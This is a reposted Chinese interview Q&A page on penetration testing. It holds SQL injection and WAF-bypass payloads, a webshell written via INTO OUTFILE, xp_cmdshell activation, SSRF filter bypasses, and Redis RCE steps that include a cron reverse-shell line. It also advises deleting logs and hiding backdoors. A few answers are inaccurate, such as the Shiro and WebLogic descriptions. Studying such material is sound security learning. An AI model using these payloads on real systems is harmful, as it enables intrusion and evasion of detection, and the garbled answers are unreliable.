2025年渗透测试面试题总结- 某亭-安全研究员(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

一、SQL注入过滤单引号绕过方法

二、MySQL报错注入常用函数

三、报错注入绕WAF

四、MySQL写文件函数

五、MySQL提权方式

六、SQL Server其他渗透方式

七、SSRF原理与利用

八、内网IP过滤绕过

九、Redis漏洞利用

十、文件读取与路径获取

十一、反序列化漏洞

十二、渗透测试流程

十三、CMS指纹特征(以WordPress为例)

十四、正向代理与反向代理区别

十五、常见端口与服务

十六、弱密码绕过验证码

十七、非对称加密过程(RSA)


 

 

SQL注入过滤单引号怎么绕过
mysql报错注入常用函数
报错注入绕WAF
mysql写文件函数
into outfile使用有哪些限制
mysql提权
SQL server除了SQL注入以外还有哪些渗透方式
SSRF原理
SSRF可以利用的协议
哪些功能点会存在SSRF漏洞
对内网IP进行过滤,有什么绕过方式
redis rce过程
redis未授权怎么获得服务器权限
redis主从复制漏洞
任意文件读取一般读取哪些文件
如何通过文件读取获得web的绝对路径
/ect/passwd 文件包含哪些内容
java 反序列化漏洞
shiro反序列化漏洞
哪些组件或者中间件存在反序列化漏洞
渗透测试一个站点的具体流程
说一个熟悉的CMS,具有哪些指纹特征
正向代理和反向代理的区别
常见端口对应服务
常见的内置用户
弱密码存在验证码如何绕过
非对称加密的加密过程

一、SQL注入过滤单引号绕过方法

  1. 双写单引号' 转为 '',可能被过滤,但部分场景可尝试 ' OR 1=1--
  2. Hex编码:将字符串转为16进制,如 SELECT * FROM users WHERE username=0x61646D696E
  3. 宽字节注入:针对GBK编码数据库,利用%df%27触发编码错误(%df与反斜杠\结合生成繁体字符)。
  4. CHAR()函数:用CHAR(39)代替单引号(如SELECT CHAR(97,100,109,105,110)对应admin)。
  5. 字符串拼接:如CONCAT('a','dmin')拼接为admin

二、MySQL报错注入常用函数

  1. updatexml()sql
    AND updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
    触发XPath语法错误,返回查询结果。
  2. extractvalue()
    sqlAND extractvalue(1,concat(0x7e,(SELECT database())))
    类似updatexml,利用XML解析报错。
  3. floor()+rand()
    sqlSELECT COUNT(*) FROM users GROUP BY concat(database(),floor(rand(0)*2))
    利用主键重复报错。
  4. exp()sql
    AND exp(~(SELECT * FROM(SELECT user())a))
    数值过大导致溢出报错。

三、报错注入绕WAF

  1. 分块传输:通过HTTP分块编码绕过正则检测。
  2. 注释干扰
    sql/*!50000updatexml*/(1,concat(0x7e,user()),1)
  3. 大小写混合:如UpDaTeXmL()
  4. 特殊符号分割
    sqlupdatexml(1,concat(0x7e,user()%23),1)
  5. 编码混淆:使用URL编码、Unicode编码(如%u0027代替单引号)。

四、MySQL写文件函数

  1. into outfile:写入多行数据,需绝对路径和权限。
    sqlSELECT '<?php phpinfo();?>' INTO OUTFILE '/var/www/html/shell.php' 
  2. dumpfile:写入二进制文件(如SSH密钥)。

限制

  • secure_file_priv需为空或目标目录。
  • Web目录需可写且路径正确。

五、MySQL提权方式

  1. UDF提权
    • 上传自定义动态库(如lib_mysqludf_sys.so )。
    • 创建函数执行系统命令:
      sqlCREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf.so' 
  2. 启动项提权
    sqlSELECT '恶意命令' INTO OUTFILE '/etc/rc.local' 
  3. CVE漏洞利用:如CVE-2016-6662(权限配置不当)。

六、SQL Server其他渗透方式

  1. xp_cmdshell:启用后执行系统命令。
    sqlEXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'whoami'
  2. SSRS漏洞:利用Reporting Services的文件上传漏洞。
  3. 数据库链接攻击:通过OPENROWSET跨数据库查询。

七、SSRF原理与利用

  1. 原理:服务器端发起未验证的网络请求(如读取本地文件或访问内网)。
  2. 协议利用
    • file://读取本地文件(如file:///etc/passwd)。
    • gopher://构造任意TCP流量(攻击Redis/MySQL)。
    • dict://探测端口信息。
  3. 高危功能点
    • 在线翻译、网页截图、URL预览、XML解析(XXE)等。

八、内网IP过滤绕过

  1. 进制转换127.0.0.1转为2130706433(十进制)或0177.0.0.1(八进制)。
  2. 域名重定向:使用短域名服务或xip.io (如127.0.0.1.xip.io )。
  3. CIDR绕过127.127.127.127/8

九、Redis漏洞利用

  1. 未授权访问RCE
    • 写入SSH密钥:
      redisconfig set dir /root/.ssh config set dbfilename authorized_keys set x "\n\nssh-rsa AAAAB3N...\n\n" save 
    • 定时任务提权:
      redisset x "\n* * * * * bash -i >& /dev/tcp/ip/port 0>&1\n" config set dir /var/spool/cron config set dbfilename root save 
  2. 主从复制漏洞:加载恶意模块执行命令。

十、文件读取与路径获取

  1. 敏感文件
    • /etc/passwd:用户列表。
    • /proc/self/environ:环境变量(可能含路径)。
    • 日志文件(如/var/log/apache2/access.log )。
  2. 路径获取
    • 从PHP错误日志或phpinfo()中查找绝对路径。
    • 配置文件(如config.php 中的__DIR__)。

十一、反序列化漏洞

  1. Java反序列化:Apache Commons Collections的InvokerTransformer链触发RCE。
  2. Shiro漏洞:硬编码AES密钥导致Cookie伪造(Padding Oracle攻击)。
  3. 常见漏洞组件
    • WebLogic(CVE-2020-14882)。
    • Fastjson(自动类型推断导致的RCE)。

十二、渗透测试流程

  1. 信息收集:子域名、端口扫描、CMS指纹识别(如Wappalyzer)。
  2. 漏洞扫描:Nessus、AWVS检测SQL注入/XSS/SSRF。
  3. 漏洞利用:Metasploit框架、手工验证。
  4. 权限提升:Linux脏牛漏洞、Windows MS14-058。
  5. 痕迹清理:删除日志、隐藏后门。

十三、CMS指纹特征(以WordPress为例)

  1. 目录结构/wp-content/plugins//wp-admin/
  2. HTTP头X-Powered-By: WordPress
  3. 默认文件readme.htmlwp-login.php

十四、正向代理与反向代理区别

正向代理反向代理
代理客户端(隐藏客户端IP)代理服务端(隐藏服务器IP)
用于突破访问限制(如VPN)用于负载均衡(如Nginx)

十五、常见端口与服务

端口服务协议
22SSHTCP
80HTTPTCP
443HTTPSTCP
3306MySQLTCP
6379RedisTCP

十六、弱密码绕过验证码

  1. OCR识别:Tesseract识别简单验证码。
  2. 验证码复用:同一会话重复提交。
  3. Burp暴力破解:设置Intruder模块跳过验证码参数。

十七、非对称加密过程(RSA)

  1. 密钥生成:生成公钥(公开)和私钥(保密)。
  2. 加密:用公钥加密明文(如c = m^e mod n)。
  3. 解密:用私钥解密密文(如m = c^d mod n)。
  4. 应用场景:HTTPS握手、SSH登录。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/37793.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MacOS安装 nextcloud 的 Virtual File System

需求 在Mac上安装next cloud实现类似 OneDrive 那样&#xff0c;文件直接保存在服务器&#xff0c;需要再下载到本地。 方法 在 官网下载Download for desktop&#xff0c;注意要下对版本&#xff0c;千万别下 Mac OS默认的那个。 安装了登录在配置过程中千万不要设置任何同…

1.8 函数的连续性和间断点

1.连续的定义 2.间断点的定义 3.间断点的分类

Unity 云渲染本地部署方案

Unity Render Streaming 云渲染环境搭建 0.安装 Unity Render Streaming 实现原理: 服务器与客户端实现功能包括: 详细内容见官方文档&#xff1a; 官方文档: https://docs.unity3d.com/Packages/com.unity.renderstreaming3.1/manual/tutorial.html Unity 流送云渲染介绍: …

每日一题力扣3248.矩阵中的蛇c++

3248. 矩阵中的蛇 - 力扣&#xff08;LeetCode&#xff09; class Solution { public:int finalPositionOfSnake(int n, vector<string>& commands) {int i 0;int j 0;for (int k0;k<commands.size();k) {if (commands[k] "RIGHT")j;else if (comma…

本地基于Ollama部署的DeepSeek详细接口文档说明

前文&#xff0c;我们已经在本地基于Ollama部署好了DeepSeek大模型&#xff0c;并且已经告知过如何查看本地的API。为了避免网络安全问题&#xff0c;我们希望已经在本地调优的模型&#xff0c;能够嵌入到在本地的其他应用程序中&#xff0c;发挥本地DeepSeek的作用。因此需要知…

FPGA 以太网通信(三)

一、UDP协议 UDP&#xff08;User Datagram Protocol Protocol&#xff09;&#xff0c;即用户数据报协议&#xff0c;是一种面向无连接的传输层协议。UDP和TCP协议都属于传输层协议&#xff0c;在网络传输中同一 IP 服务器需要提供各种不同的服务&#xff0c;为了区别不同的服…

期刊分区表2025年名单下载(经济学、管理学)

2025年期刊分区表包括SCIE、SSCI、A&HCI、ESCI和OAJ&#xff0c;共设置了包括自然科学、社会科学和人文科学在内的21个大类 本次分享的是期刊分区表2025年名单经济学类、管理学类&#xff0c;一共7631025条 一、数据介绍 数据名称&#xff1a;期刊分区表2025年名单 数据…

如何在MCU工程中启用HardFault硬错误中断

文章目录 一、HardFault出现场景二、启动HardFault三、C代码示例 一、HardFault出现场景 HardFault&#xff08;硬故障&#xff09; 错误中断是 ARM Cortex-M 系列微控制器中一个较为严重的错误中断&#xff0c;一旦触发&#xff0c;表明系统遇到了无法由其他异常处理机制解决…

智能体开发革命:灵燕平台如何重塑企业AI应用生态

在AI技术深度渗透产业的今天&#xff0c;**灵燕智能体平台**以“全生命周期管理”为核心&#xff0c;为企业提供从智能体开发、协作到落地的闭环解决方案&#xff0c;开创了AI应用工业化生产的新模式。 三位一体的智能体开发体系 1. Agent Builder&#xff1a;零门槛构建专属…

机器学习之支持向量机(SVM)算法详解

文章目录 引言一、 什么是支持向量机&#xff08;SVM&#xff09;二、 SVM的基本原理三、数学推导1.线性可分情况2. 非线性可分情况3. 核函数 四、SVM的优缺点优点&#xff1a;缺点&#xff1a; 五、 应用场景六、 Python实现示例七、 总结 引言 支持向量机&#xff08;Suppor…

【C++进阶】深入探索类型转换

目录 一、C语言中的类型转换 1.1 隐式类型转换 1.2. 显式类型转换 1.3.C语言类型转换的局限性 二、C 类型转换四剑客 2.1 static_cast&#xff1a;静态类型转换&#xff08;编译期检查&#xff09; 2.2 dynamic_cast&#xff1a;动态类型转换&#xff08;运行时检查&…

机器学习之KL散度推导

机器学习之KL散度推导 预备知识 熵、交叉熵、条件熵 熵 (Entropy) 这一词最初来源于热力学。1948年&#xff0c;克劳德爱尔伍德香农将热力学中的熵引入信息论&#xff0c;所以也被称为香农熵 (Shannon entropy)、信息熵 (information entropy)。 对于具体熵的定义和用法推荐…

使用PlotNeuralNet绘制ResNet50模型

一、下载所需软件 1、下载MikTex 作用:将.tex文件转换为PDF文件 下载官网链接:Getting MiKTeX 2、下载Git 作用:将PlotNeuralNet库从GitHub上下载下来,在cmd使用命令行: git clone https://github.com/SamuraiBUPT/PlotNeuralNet-Windows.git 就可以将PlotNeuralNet…

10分钟打造专属AI助手:用ms-swift实现自我认知微调

想象一下&#xff0c;你是辛辛苦苦利用开源模型打造一个专属的AI产品助手。这个助手不仅能高效解答客户的问题&#xff0c;还能自豪地告诉大家&#xff1a;“我是某某打造的某某助手&#xff0c;代表着我们的品牌和价值观。” 然而&#xff0c;当前市面上的开源AI模型虽然技术先…

尝试使用tauri2+Django+React的项目

前言 使用Tauri2前端&#xff0c;本质是进程间的通信。并非前后端。 而想使用nw&#xff0c;先后端打包exe&#xff0c;再和前端打包成exe&#xff0c;并没有完成成功。 而笔者从Tauri中看到这种可能性。很有可能成功基于SeaORMMySQLTauri2ViteReact等的CRUD交互项目-CSDN博…

【JavaWeb学习Day27】

Tlias前端 员工管理 条件分页查询&#xff1a; 页面布局 搜索栏&#xff1a; <!-- 搜索栏 --><div class"container"><el-form :inline"true" :model"searchEmp" class"demo-form-inline"><el-form-item label…

Milvus WeightedRanker 对比 RRF 重排机制

省流:优先选择WeightedRanker 以rag为例,优先选择bm25全文检索,其次选择向量检索 Milvus混合搜索中的重排机制 Milvus通过hybrid_search() API启用混合搜索功能&#xff0c;结合复杂的重排策略来优化多个AnnSearchRequest实例的搜索结果。本主题涵盖了重排过程&#xff0c;…

PLY格式文件如何转换成3DTiles格式——使用GISBox软件实现高效转换

一、概述 在三维GIS和数字孪生领域&#xff0c;3DTiles格式已成为主流的数据格式之一。它由Cesium团队提出&#xff0c;专为大规模3D数据可视化设计&#xff0c;能够高效地加载和展示海量模型数据。而PLY格式则是一种常见的三维模型文件格式&#xff0c;主要用于存储点云数据或…

Junit在测试过程中的使用方式,具体使用在项目测试中的重点说明

JUnit 是一个广泛使用的 Java 单元测试框架,主要用于编写和运行可重复的测试。以下是 JUnit 在项目测试中的使用方式和重点说明: 1. 基本使用 场景:测试一个简单的 Java 类。 示例: import org.junit.Test; import static org.junit.Assert.*;public class CalculatorTe…

《C++11 基于CAS无锁操作的atomic原子类型》

count; count--; 我们知道&#xff0c;/--操作并不是原子性的&#xff0c;其实对应三条汇编指令来完成的。 读取&#xff1a;从内存中把变量的值读取到寄存器修改&#xff1a;在寄存器里将变量的值1/-1写入&#xff1a;把修改后的值写入到内存 在单线程环境下&#xff0c;这…